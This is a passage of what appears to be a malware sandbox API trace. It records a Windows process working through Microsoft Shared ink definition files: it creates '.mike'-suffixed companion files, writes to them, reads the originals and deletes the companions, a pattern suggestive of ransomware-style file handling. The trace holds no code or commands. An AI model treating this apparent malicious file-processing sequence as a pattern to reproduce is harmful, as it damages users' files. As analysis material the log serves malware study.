Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml"), fInfoLevelId=0x0, lpFileInformation=0x228b234 | out: lpFileInformation=0x228b234*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f832d2f, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f832d2f, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f858e8d, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1d7)) returned 1 [0046.188] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0046.189] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", lpFilePart=0x0) returned 0x58 [0046.189] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.mike", lpFilePart=0x0) returned 0x5d [0046.189] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0046.189] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0046.189] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0046.189] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", lpFilePart=0x0) returned 0x58 [0046.189] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", lpFilePart=0x0) returned 0x58 [0046.189] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", nBufferLength=0x105, lpBuffer=0x2aebac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", lpFilePart=0x0) returned 0x58 [0046.189] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.mike", lpFilePart=0x0) returned 0x5d [0046.189] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af010) returned 1 [0046.189] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af08c | out: lpFileInformation=0x2af08c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0046.189] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af00c) returned 1 [0046.189] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.mike", lpFilePart=0x0) returned 0x5d [0046.189] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0046.189] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.190] GetFileType (hFile=0x264) returned 0x1 [0046.190] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0046.190] GetFileType (hFile=0x264) returned 0x1 [0046.190] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x0 [0046.190] WriteFile (in: hFile=0x264, lpBuffer=0x228c2ac*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x228c2ac*, lpNumberOfBytesWritten=0x2af02c*=0x220, lpOverlapped=0x0) returned 1 [0046.191] CloseHandle (hObject=0x264) returned 1 [0046.191] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0046.191] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml"), fInfoLevelId=0x0, lpFileInformation=0x228bd3c | out: lpFileInformation=0x228bd3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f832d2f, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f832d2f, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f858e8d, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1d7)) returned 1 [0046.191] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0046.191] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", nBufferLength=0x105, lpBuffer=0x2aeaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", lpFilePart=0x0) returned 0x58 [0046.191] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0046.191] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.191] GetFileType (hFile=0x264) returned 0x1 [0046.191] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0046.191] GetFileType (hFile=0x264) returned 0x1 [0046.192] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af02c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af02c*=0) returned 0x0 [0046.192] ReadFile (in: hFile=0x264, lpBuffer=0x228d400, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x228d400*, lpNumberOfBytesRead=0x2af038*=0x1d7, lpOverlapped=0x0) returned 1 [0046.192] CloseHandle (hObject=0x264) returned 1 [0046.193] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.mike", lpFilePart=0x0) returned 0x5d [0046.193] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0046.193] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.193] GetFileType (hFile=0x264) returned 0x1 [0046.193] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0046.193] GetFileType (hFile=0x264) returned 0x1 [0046.193] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x220 [0046.193] WriteFile (in: hFile=0x264, lpBuffer=0x2290dfc*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x2290dfc*, lpNumberOfBytesWritten=0x2af02c*=0x1e0, lpOverlapped=0x0) returned 1 [0046.194] CloseHandle (hObject=0x264) returned 1 [0046.195] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeac0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.mike", lpFilePart=0x0) returned 0x5d [0046.195] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefb4) returned 1 [0046.195] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.195] GetFileType (hFile=0x264) returned 0x1 [0046.195] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefb0) returned 1 [0046.195] GetFileType (hFile=0x264) returned 0x1 [0046.196] WriteFile (in: hFile=0x264, lpBuffer=0x2294050*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x2294050*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0046.196] CloseHandle (hObject=0x264) returned 1 [0046.197] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", lpFilePart=0x0) returned 0x58 [0046.197] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.mike", lpFilePart=0x0) returned 0x5d [0046.197] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0046.197] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5bb8600, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5bb8600, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5bde760, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x400)) returned 1 [0046.197] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0046.197] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", lpFilePart=0x0) returned 0x58 [0046.197] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.mike", lpFilePart=0x0) returned 0x5d [0046.197] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0046.197] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x22958d4 | out: lpFileInformation=0x22958d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5bb8600, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5bb8600, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5bde760, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x400)) returned 1 [0046.197] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0046.197] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", lpFilePart=0x0) returned 0x58 [0046.197] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", dwFileAttributes=0x80) returned 0 [0046.198] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", lpFilePart=0x0) returned 0x58 [0046.198] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.mike", lpFilePart=0x0) returned 0x5d [0046.198] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe0) returned 1 [0046.199] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af05c | out: lpFileInformation=0x2af05c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5bb8600, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5bb8600, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5bde760, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x400)) returned 1 [0046.199] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefdc) returned 1 [0046.199] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", lpFilePart=0x0) returned 0x58 [0046.199] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.mike", lpFilePart=0x0) returned 0x5d [0046.199] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.mike")) returned 1 [0046.200] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0046.200] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu", lpFilePart=0x0) returned 0x48 [0046.200] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\", nBufferLength=0x105, lpBuffer=0x2aec38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\", lpFilePart=0x0) returned 0x49 [0046.200] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\*", lpFindFileData=0x2aee84 | out: lpFindFileData=0x2aee84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe5bb8600, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5bde760, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.200] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe5bb8600, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5bde760, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.200] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f832d2f, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f832d2f, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f858e8d, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="oskmenubase.xml", cAlternateFileName="")) returned 1 [0046.200] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f832d2f, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f832d2f, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f858e8d, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="oskmenubase.xml", cAlternateFileName="")) returned 0 [0046.200] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.201] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0046.201] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0046.201] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\.", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad", lpFilePart=0x0) returned 0x4a [0046.201] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0046.201] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.201] CoTaskMemFree (pv=0x4fe370) [0046.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0046.201] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad", nBufferLength=0x105, lpBuffer=0x2aec94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad", lpFilePart=0x0) returned 0x4a [0046.201] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0046.201] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad", lpFilePart=0x0) returned 0x4a [0046.201] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\", nBufferLength=0x105, lpBuffer=0x2aec38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\", lpFilePart=0x0) returned 0x4b [0046.201] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\*", lpFindFileData=0x2aee84 | out: lpFindFileData=0x2aee84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.202] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.202] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fdda123, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fdda123, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fdda123, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x59d, dwReserved0=0x0, dwReserved1=0x0, cFileName="osknumpadbase.xml", cAlternateFileName="")) returned 1 [0046.202] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0046.202] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.202] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0046.202] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0046.202] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", lpFilePart=0x0) returned 0x5c [0046.202] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", lpFilePart=0x0) returned 0x5c [0046.202] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", lpFilePart=0x0) returned 0x5c [0046.202] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0046.202] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml" (normalized: "c:\\program files\\common files\\microsoft 